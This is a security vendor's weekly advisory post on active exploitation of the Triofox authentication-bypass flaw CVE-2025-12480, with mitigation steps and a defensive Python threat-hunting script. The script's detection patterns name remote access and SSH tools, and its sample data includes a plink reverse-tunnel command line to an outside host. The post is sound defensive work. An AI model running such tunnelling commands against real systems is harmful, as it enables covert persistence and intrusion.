Week 46 – The Antivirus That Opened the Door: Triofox Under Active Attack

10 – 16 Nov 2025

Mandiant has confirmed that threat actors are actively exploiting a critical flaw (CVE-2025-12480) in Triofox by Gladinet — a remote access and file-sharing platform.
The vulnerability allows authentication bypass, letting attackers create admin accounts and execute arbitrary code by abusing the built-in antivirus feature.

This is our new CVE of the Week — a critical flaw with a CVSS score of 9.1.

Once inside, attackers deploy Zoho Assist and AnyDesk and establish SSH tunnels (port 433) for persistence and lateral movement.
Activity began in August 2025, shortly after patches were released — marking the third Triofox exploit this year.

Why does it matter?

  • Full authentication bypass → instant admin control
  • Security feature (AV) turned into an attack vector
  • Exploitation within weeks of patch release

What should you do now?

  • Patch immediately to version 16.7.10368.56560 or newer.
  • Lock down initial setup/config pages – this was the entry point.
  • Audit admin accounts and AV scanner paths.
  • Hunt for remote access tools (Zoho Assist, AnyDesk, Plink, PuTTY).
  • Monitor for unusual SSH/RDP activity, especially on non-standard ports.
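As an added illustration of the last two hunting steps (this is example code, not from the original post or the Mandiant report): a small Python triage script that flags the remote access tools named above and SSH clients pointed at non-standard ports, run over constructed endpoint telemetry. The event schema (host, image, cmdline, dst_port) and the process-name needles are assumptions to be tuned to your own EDR or log source.

```python
import re

# Process-name needles for the tools listed in the write-up. These are assumed
# image-name fragments, not verified binary names; tune them to your telemetry.
REMOTE_ACCESS_TOOLS = {
    "zohoassist": "Zoho Assist", "anydesk": "AnyDesk",
    "plink": "Plink", "putty": "PuTTY",
}
SSH_STANDARD_PORT = 22
CAMPAIGN_PORTS = {433}  # non-standard SSH port named in the write-up
PORT_FLAG = re.compile(r"(?:^|\s)-p\s*(\d+)", re.IGNORECASE)      # -p (ssh) / -P (plink)
FORWARD_FLAG = re.compile(r"(?:^|\s)-[LRD]\s*\S+", re.IGNORECASE)  # tunnel flags


def classify_event(event: dict) -> list[str]:
    """Return the reasons, if any, that a single event deserves analyst attention."""
    findings = []
    image = event.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    stem = image.rsplit(".", 1)[0]
    for needle, label in REMOTE_ACCESS_TOOLS.items():
        if needle in stem:
            findings.append(f"remote access tool present: {label}")
    cmd = event.get("cmdline", "")
    if stem in ("plink", "ssh"):
        port = PORT_FLAG.search(cmd)
        if port and int(port.group(1)) != SSH_STANDARD_PORT:
            findings.append(f"ssh client to non-standard port {port.group(1)}")
        if FORWARD_FLAG.search(cmd):
            findings.append("ssh port-forwarding flag on command line")
    if event.get("dst_port") in CAMPAIGN_PORTS:
        findings.append(f"outbound connection to port {event['dst_port']}")
    return findings


def hunt(events: list[dict]) -> list[tuple[str, str]]:
    """Run classify_event over a batch and flatten to (host, finding) pairs."""
    return [(e["host"], f) for e in events for f in classify_event(e)]


# Constructed sample telemetry (assumed schema); the first event is benign and must not fire.
SAMPLE_EVENTS = [
    {"host": "srv-fs01", "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs", "dst_port": 443},
    {"host": "srv-fs01", "image": r"C:\ProgramData\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe --service", "dst_port": 443},
    {"host": "srv-fs01", "image": r"C:\Users\Public\plink.exe", "cmdline": "plink.exe -ssh -P 433 -R 3389:127.0.0.1:3389 user@203.0.113.10", "dst_port": 433},
]

if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```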

This campaign is a powerful reminder that “trusted” features can become threats if not hardened.
Patching alone isn’t enough — configuration hygiene, privilege control, and active monitoring are equally critical.

You can find the full technical details in the article below.
https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480


White Hat IT Security is a Europe-based Managed Security Services Provider (MSSP) and proud Microsoft Solution Partner. Its Microsoft-verified managed security solutions (MXDR) reflect its deep expertise and commitment to excellence in cybersecurity. The company was awarded the Partner of the Year Hungary Award by Microsoft in 2024.

With the largest incident response capacity in the CEE region, they’re trusted by organizations to deliver fast, effective, and proactive protection. Their portfolio includes penetration testing, vulnerability assessments, managed Cyber Threat Intelligence, as well as Governance, Risk and Compliance (GRC) consulting and specialized security training.

They are committed to supporting professional initiatives that aim to raise cybersecurity awareness and maturity—both for individuals and organizations. They regularly contribute to the community through knowledge sharing, education, and outreach, helping to build a safer digital future for all.